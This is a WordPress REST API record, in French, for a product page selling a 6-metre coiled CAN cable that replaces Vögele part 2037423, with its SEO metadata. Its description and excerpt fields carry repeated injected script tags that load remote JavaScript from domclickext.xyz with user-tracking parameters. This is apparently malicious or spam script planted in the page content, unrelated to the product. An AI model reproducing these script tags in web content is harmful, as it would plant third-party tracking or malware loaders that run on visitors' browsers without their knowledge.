{"id":3011,"date":"2020-12-25T15:09:22","date_gmt":"2020-12-25T14:09:22","guid":{"rendered":"http:\/\/laserelectronique.com\/?product=import-placeholder-for-3044"},"modified":"2020-12-26T13:11:19","modified_gmt":"2020-12-26T12:11:19","slug":"cable-2037423-vogele","status":"publish","type":"product","link":"https:\/\/laserelectronique.com\/?product=cable-2037423-vogele","title":{"rendered":"C\u00e2ble 2037423 V\u00f6gele"},"content":{"rendered":"<div class=\"content--title\"><strong><strong>C\u00e2ble \u00e0 spirale de 6 m remplace 2037423 <\/strong>V\u00f6gele<\/strong><\/div>\n<div class=\"product--description\"><\/div>\n<ul>\n<li><strong>Longueur: 6 m\u00e8tres (\u00e9tir\u00e9)<\/strong><\/li>\n<li><strong>Connecteurs: Baj 7 broches.\u00a0femelle (CAN), Baj 7 broches.\u00a0m\u00e2le (CAN) incl.\u00a02x r\u00e9sistance de terminaison de bus de 120 Ohm<\/strong><\/li>\n<\/ul>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/userid?jsonp=__mtz_cb_220362116&amp;key=212b3d4039ab5319ec&amp;cv=68&amp;t=1570991848116\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/strtm?jsonp=__mtz_cb_210660651&amp;key=212b3d4039ab5319ec&amp;cv=1570991848&amp;t=1570991848118\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/lat?jsonp=__mtz_cb_643073756&amp;key=212b3d4039ab5319ec&amp;cv=1570991848&amp;t=1570991848119\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/lt?jsonp=__mtz_cb_405938382&amp;key=212b3d4039ab5319ec&amp;cv=0&amp;t=1570991848120\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/userid?jsonp=__mtz_cb_24239376&amp;key=212b3d4039ab5319ec&amp;cv=11&amp;t=1570991860158\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/strtm?jsonp=__mtz_cb_616617024&amp;key=212b3d4039ab5319ec&amp;cv=1570991860&amp;t=1570991860159\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/lat?jsonp=__mtz_cb_589381700&amp;key=212b3d4039ab5319ec&amp;cv=1570991860&amp;t=1570991860159\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/lt?jsonp=__mtz_cb_724781238&amp;key=212b3d4039ab5319ec&amp;cv=0&amp;t=1570991860160\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp;<\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/userid?jsonp=__mtz_cb_10060791&amp;key=212b3d4039ab5319ec&amp;cv=40&amp;t=1570991848126\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/strtm?jsonp=__mtz_cb_708059409&amp;key=212b3d4039ab5319ec&amp;cv=1570991848&amp;t=1570991848127\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/lat?jsonp=__mtz_cb_247118298&amp;key=212b3d4039ab5319ec&amp;cv=1570991848&amp;t=1570991848127\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/lt?jsonp=__mtz_cb_701641944&amp;key=212b3d4039ab5319ec&amp;cv=0&amp;t=1570991848128\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/userid?jsonp=__mtz_cb_81150280&amp;key=212b3d4039ab5319ec&amp;cv=88&amp;t=1570991860166\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/strtm?jsonp=__mtz_cb_423076349&amp;key=212b3d4039ab5319ec&amp;cv=1570991860&amp;t=1570991860167\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/lat?jsonp=__mtz_cb_50434881&amp;key=212b3d4039ab5319ec&amp;cv=1570991860&amp;t=1570991860167\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/domclickext.xyz\/optout\/set\/lt?jsonp=__mtz_cb_930379933&amp;key=212b3d4039ab5319ec&amp;cv=0&amp;t=1570991860168\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"featured_media":3060,"comment_status":"open","ping_status":"closed","template":"","meta":[],"product_cat":[11,14],"product_tag":[],"class_list":{"0":"post-3011","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-accessoires-de-nivellement","7":"product_cat-finisseurs","8":"","10":"first","11":"instock","12":"taxable","13":"shipping-taxable","14":"product-type-simple"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>C\u00e2ble 2037423 V\u00f6gele - LASER ELECTRONIQUE TP<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/laserelectronique.com\/?product=cable-2037423-vogele\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"C\u00e2ble 2037423 V\u00f6gele - LASER ELECTRONIQUE TP\" \/>\n<meta property=\"og:description\" content=\"&nbsp;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/laserelectronique.com\/?product=cable-2037423-vogele\" \/>\n<meta property=\"og:site_name\" content=\"LASER ELECTRONIQUE TP\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-26T12:11:19+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/04-02-02634-6m_CAN_connection_coil_cable.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\n\t<meta property=\"og:image:height\" content=\"1600\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/laserelectronique.com\/?product=cable-2037423-vogele\",\"url\":\"https:\/\/laserelectronique.com\/?product=cable-2037423-vogele\",\"name\":\"C\u00e2ble 2037423 V\u00f6gele - LASER ELECTRONIQUE TP\",\"isPartOf\":{\"@id\":\"https:\/\/laserelectronique.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/laserelectronique.com\/?product=cable-2037423-vogele#primaryimage\"},\"image\":{\"@id\":\"https:\/\/laserelectronique.com\/?product=cable-2037423-vogele#primaryimage\"},\"thumbnailUrl\":\"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/04-02-02634-6m_CAN_connection_coil_cable.jpg\",\"datePublished\":\"2020-12-25T14:09:22+00:00\",\"dateModified\":\"2020-12-26T12:11:19+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/laserelectronique.com\/?product=cable-2037423-vogele#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/laserelectronique.com\/?product=cable-2037423-vogele\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/laserelectronique.com\/?product=cable-2037423-vogele#primaryimage\",\"url\":\"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/04-02-02634-6m_CAN_connection_coil_cable.jpg\",\"contentUrl\":\"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/04-02-02634-6m_CAN_connection_coil_cable.jpg\",\"width\":1600,\"height\":1600},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/laserelectronique.com\/?product=cable-2037423-vogele#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/laserelectronique.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Boutique\",\"item\":\"https:\/\/laserelectronique.com\/?page_id=7\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"C\u00e2ble 2037423 V\u00f6gele\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/laserelectronique.com\/#website\",\"url\":\"https:\/\/laserelectronique.com\/\",\"name\":\"LASER ELECTRONIQUE TP\",\"description\":\"VOTRE PARTENAIRE EN GUIDAGE D&#039;ENGINS, TOPOGRAPHIE ET SERVICES\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/laserelectronique.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"C\u00e2ble 2037423 V\u00f6gele - LASER ELECTRONIQUE TP","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/laserelectronique.com\/?product=cable-2037423-vogele","og_locale":"fr_FR","og_type":"article","og_title":"C\u00e2ble 2037423 V\u00f6gele - LASER ELECTRONIQUE TP","og_description":"&nbsp;","og_url":"https:\/\/laserelectronique.com\/?product=cable-2037423-vogele","og_site_name":"LASER ELECTRONIQUE TP","article_modified_time":"2020-12-26T12:11:19+00:00","og_image":[{"width":1600,"height":1600,"url":"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/04-02-02634-6m_CAN_connection_coil_cable.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/laserelectronique.com\/?product=cable-2037423-vogele","url":"https:\/\/laserelectronique.com\/?product=cable-2037423-vogele","name":"C\u00e2ble 2037423 V\u00f6gele - LASER ELECTRONIQUE TP","isPartOf":{"@id":"https:\/\/laserelectronique.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/laserelectronique.com\/?product=cable-2037423-vogele#primaryimage"},"image":{"@id":"https:\/\/laserelectronique.com\/?product=cable-2037423-vogele#primaryimage"},"thumbnailUrl":"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/04-02-02634-6m_CAN_connection_coil_cable.jpg","datePublished":"2020-12-25T14:09:22+00:00","dateModified":"2020-12-26T12:11:19+00:00","breadcrumb":{"@id":"https:\/\/laserelectronique.com\/?product=cable-2037423-vogele#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/laserelectronique.com\/?product=cable-2037423-vogele"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/laserelectronique.com\/?product=cable-2037423-vogele#primaryimage","url":"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/04-02-02634-6m_CAN_connection_coil_cable.jpg","contentUrl":"https:\/\/laserelectronique.com\/wp-content\/uploads\/2020\/12\/04-02-02634-6m_CAN_connection_coil_cable.jpg","width":1600,"height":1600},{"@type":"BreadcrumbList","@id":"https:\/\/laserelectronique.com\/?product=cable-2037423-vogele#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/laserelectronique.com\/"},{"@type":"ListItem","position":2,"name":"Boutique","item":"https:\/\/laserelectronique.com\/?page_id=7"},{"@type":"ListItem","position":3,"name":"C\u00e2ble 2037423 V\u00f6gele"}]},{"@type":"WebSite","@id":"https:\/\/laserelectronique.com\/#website","url":"https:\/\/laserelectronique.com\/","name":"LASER ELECTRONIQUE TP","description":"VOTRE PARTENAIRE EN GUIDAGE D&#039;ENGINS, TOPOGRAPHIE ET SERVICES","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/laserelectronique.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"}]}},"_links":{"self":[{"href":"https:\/\/laserelectronique.com\/index.php?rest_route=\/wp\/v2\/product\/3011","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/laserelectronique.com\/index.php?rest_route=\/wp\/v2\/product"}],"about":[{"href":"https:\/\/laserelectronique.com\/index.php?rest_route=\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/laserelectronique.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3011"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/laserelectronique.com\/index.php?rest_route=\/wp\/v2\/media\/3060"}],"wp:attachment":[{"href":"https:\/\/laserelectronique.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3011"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/laserelectronique.com\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_cat&post=3011"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/laserelectronique.com\/index.php?rest_route=%2Fwp%2Fv2%2Fproduct_tag&post=3011"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}